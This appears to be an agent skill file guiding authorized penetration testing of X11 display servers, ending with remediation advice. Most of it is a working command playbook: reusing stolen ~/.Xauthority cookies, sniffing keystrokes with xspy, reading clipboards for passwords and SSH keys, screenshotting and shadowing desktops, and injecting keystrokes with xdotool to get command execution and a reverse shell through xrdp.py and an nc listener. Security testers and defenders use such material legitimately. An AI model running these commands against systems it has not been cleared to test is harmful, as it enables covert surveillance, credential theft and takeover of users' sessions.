pentesting-x11 - SKILL.md Agent Skill

name: pentesting-x11 description: Testing the X Window System (X11) display server during authorized engagements. X11 listens on TCP 6000+ and the local Unix socket /tmp/.X11-unix/X. Covers detecting unauthenticated ("xhost +") access with nmap NSE and Metasploit, abusing MIT-MAGIC-COOKIE-1 auth tokens from ~/.Xauthority, window/clipboard enumeration, keystroke sniffing (xspy), screenshotting (xwd), live shadowing, and keystroke injection (xdotool) for command execution. domain: cybersecurity subdomain: network-services-pentesting tags:

penetration-testing
network-services
x11
linux
keylogging
remote-desktop version: '1.0' author: xalgorix license: Apache-2.0

Pentesting X11 (port 6000)

When to Use

During authorized assessments when TCP 6000+ is open (X11 display server)
When testing for unauthenticated X11 access (xhost + style misconfiguration)
When you have a local foothold and can read a valid ~/.Xauthority cookie
When you want screenshots, clipboard contents, keystroke capture, or input injection from an X session
When pivoting from a captured display to command execution on the host

Quick Enumeration

# Check for anonymous (open) X11 access
nmap -sV --script x11-access -p 6000 <IP>
msf> use auxiliary/scanner/x11/open_x11

# Local triage (post-foothold) — find DISPLAY and cookie
echo "$DISPLAY"
ls -lah /tmp/.X11-unix/
ps -efww | grep -E '[X]org|[X]wayland'      # look for -auth <file> in cmdline
xauth info
xauth list

# Shodan-style discovery
# port:6000 x11

Critical: Checks Most Often Missed

Open X11 (no auth) — xhost + or open access control lets any host connect to display :0 with no token. Confirm with x11-access / open_x11, then enumerate windows directly.
MIT-MAGIC-COOKIE-1 reuse — the 128-bit cookie in ~/.Xauthority is sent in plaintext and grants full access. If you can read the file (or another user's), export XAUTHORITY=/path/to/.Xauthority and connect.
Cookie via Xorg -auth argument — the X server's command line often reveals the authoritative auth file path (ps -efww | grep Xorg), readable with sufficient privileges.
Access ≠ "just graphics" — a connected display enables window enumeration, clipboard theft, screenshots, keystroke sniffing, and input injection (effectively RCE in the user's session).
Unix socket foothold — even when 6000/tcp is closed, a local foothold + valid cookie abuses /tmp/.X11-unix/X<display>.
XSendEvent ignored — apps often drop injected events sent to a specific window; activate the window first, then inject normal key events for reliability.

How to CONFIRM: open access is confirmed when xdpyinfo -display <IP>:0 or xwininfo -root -tree -display <IP>:0 returns display/window data without an auth error. With a cookie, confirm by setting XAUTHORITY and running the same command successfully.

Workflow

Step 1: Enumerate (detect, find display + cookie)

# Remote anonymous check
nmap -sV --script x11-access -p 6000 <IP>

# Local: identify the active display and session
w                                            # shows DISPLAY (e.g. :0) and WHAT
echo "$DISPLAY"; ls -lah /tmp/.X11-unix/
xauth list                                   # cookies known to this user

# Use a cookie you obtained
export XAUTHORITY=/path/to/.Xauthority

Step 2: Authenticate / connect and inspect the display

# Display + screen info confirms access
xdpyinfo -display <IP>:<display>
xwininfo -root -tree -display <IP>:<display>     # window tree + IDs

# Follow-up enumeration
xlsclients -display <IP>:<display>
xprop -root _NET_ACTIVE_WINDOW -display <IP>:<display>
xinput --list --display <IP>:<display>

Step 3: Exploit / Extract (sniff, clipboard, screenshot)

# Keystroke sniffing
xspy <IP>:<display>
xinput --test_xi2 --display <IP>:<display>       # monitor input events

# Clipboard theft (credentials, tokens, SSH keys, password-manager pastes)
xclip -display <IP>:<display> -selection clipboard -o
xsel  --display <IP>:<display> --clipboard --output

# Screenshot the root window
xwd -root -screen -silent -display <IP>:0 > screenshot.xwd
convert screenshot.xwd screenshot.png

# Live shadowing of a window / display
xwininfo -root -display <IP>:0                   # get window ID (e.g. 0x45)
./xwatchwin <IP>:0 -w 0x45                       # live view
xpra shadow :0                                   # maintained alternative

Step 4: Post-access / command execution

# Keystroke injection -> run commands in the user's session
WID=$(xdotool search --onlyvisible --name '.*' | head -n 1)
xdotool windowactivate --sync "$WID"
xdotool type --delay 50 'xterm &'
xdotool key Return
# (activating the window first beats XSendEvent filtering)

# Metasploit keyboard-exec module
msf> use exploit/unix/x11/x11_keyboard_exec

# xrdp.py command exec / reverse shell over X11
./xrdp.py <IP>:0
./xrdp.py <IP>:0 --no-disp                        # then use R-Shell to a nc listener
nc -lvp 5555

Key Concepts

Concept	Description
X11 / X Window System	Network-capable windowing system for UNIX-like OSes
Display number	Maps to TCP 6000 + display and Unix socket /tmp/.X11-unix/X
MIT-MAGIC-COOKIE-1	128-bit shared secret in ~/.Xauthority sent plaintext to authorize clients
XAUTHORITY	Env var pointing to the auth cookie file
xhost access control	Host-based ACL; `xhost +` disables it (open access)
Input injection	Sending synthetic key/mouse events (xdotool) to the session
XSendEvent filtering	Apps ignore synthetic events targeted at a window; activate-then-type instead
Shadowing	Live viewing/control of a display via xwatchwin / xpra

Tools & Systems

Tool	Purpose
nmap (x11-access)	Detect unauthenticated X11 access
Metasploit open_x11 / x11_keyboard_exec	Detect open displays and inject commands
xauth	Inspect/manage MIT-MAGIC-COOKIE auth tokens
xdpyinfo / xwininfo / xlsclients / xinput	Display, window, client, and input enumeration
xspy	Keystroke sniffing on a connected display
xclip / xsel	Read clipboard/primary selection contents
xwd + convert	Capture and convert screenshots
xwatchwin / xpra	Live window/display shadowing
xdotool	Keystroke/mouse injection for command execution

Common Scenarios

Scenario 1: Open Display Screenshot

nmap --script x11-access flags display :0 as open. xwd -root -display <IP>:0 captures the desktop, exposing an open terminal and a password manager window.

Scenario 2: Cookie Reuse

A readable ~/.Xauthority is pulled from a foothold. Setting XAUTHORITY and running xdpyinfo confirms access; xspy then captures the user typing a sudo password.

Scenario 3: Clipboard Secret Theft

Connected to a display, xclip -selection clipboard -o returns a freshly copied SSH private key, reused to authenticate to other hosts.

Scenario 4: Input Injection to RCE

With access to display :0, xdotool activates a visible window and types commands to spawn a reverse shell, turning display access into code execution in the user's session.

Output Format

## X11 Finding

**Service**: X Window System (X11)
**Severity**: <Critical|High|Medium>
**Host**: <IP>:6000 (display :<n>)
**Access**: <open/no-auth | cookie-reuse>

### Summary
<What was found: open display, reusable cookie, keystroke capture, clipboard theft, RCE via injection>

### Evidence
- Command: <nmap / xdpyinfo / xspy / xclip / xdotool>
- Output: <display info, sniffed keystrokes (redacted), screenshot path>

### Impact Demonstrated
| Capability | Result |
|------------|--------|
| Screenshot | desktop captured |
| Keylogging | credentials observed |
| Input injection | command executed in user session |

### Recommendation
1. Never disable X11 access control (`xhost +`); use cookie-based auth only
2. Tunnel X11 over SSH (X11 forwarding) instead of exposing TCP 6000
3. Disable the X server TCP listener (`-nolisten tcp`) where not required
4. Protect ~/.Xauthority files and restrict the Xorg -auth file permissions
5. Firewall ports 6000-6010 from untrusted networks